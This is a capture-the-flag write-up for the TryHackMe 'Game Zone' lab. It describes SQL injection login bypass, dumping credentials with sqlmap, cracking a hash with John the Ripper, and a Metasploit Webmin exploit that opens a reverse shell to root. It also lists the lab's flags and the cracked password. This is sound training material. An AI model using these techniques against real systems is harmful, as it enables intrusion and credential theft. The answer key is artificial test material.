THM Game Zone - grunt92/IT-Sec-WriteUps GitHub Wiki

Deploy the vulnerable machine

Deploy the machine and access its web server.

No answer needed

What is the name of the large cartoon avatar holding a sniper on the forum?

Use reverse image search to figure out the name

Agent 47

Obtain access via SQLi

Here is a potential place of vulnerability, as you can input your username as another SQL query. This will take the query write, place and execute it.

No answer needed

The extra SQL we inputted as our password has changed the above query to break the initial query and proceed (with the admin user) if 1==1, then comment the rest of the query to stop it breaking.

No answer needed

When you've logged in, what page do you get redirected to?

portal.php

Using SQLMap

In the users table, what is the hashed password?

Follow the instructions given by THM. After sqlmap has finished running go to the directory provided by sqlmap and open the users.csv-file

ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

What was the username associated with the hashed password?

agent47

What was the other table name?

post

Cracking a password with JohnTheRipper

Once you have JohnTheRipper installed you can run it against your hash using the following arguments

No answer needed

What is the de-hashed password?

Follow the instructions and you get the password.

videogamer124

What is the user flag?

Run ssh agent47@IP and enter the password. Run cat user.txt and you get the flag.

649ac17b1480ac13ef1e4fa579dac95c

Exposing services with reverse SSH tunnels

How many TCP sockets are running?

5

What is the name of the exposed CMS?

Follow the instructions and login to the webserver using the previously gained credentials

webmin

What is the CMS version?

1.580

Privilege Escalation with Metasploit

What is the root flag?

Use msfconsole and search for "webmin 1.580" and select the first exploit ending with "webmin_show_cgi_exec". Set the password and the username to the credentials we figured out. Set the RHOST to the IP of the tunnel-IP that was set up and SSL to false. Set the PAYLOAD to "cmd/unix/reverse". Set the LHOST of the payload to the IP of your machine and start the exploit. After the exploit is completed and a reverse-shell was established you can run cat /root/root.txt to get the flag.

a4b945830144bdd71908d12d902adeee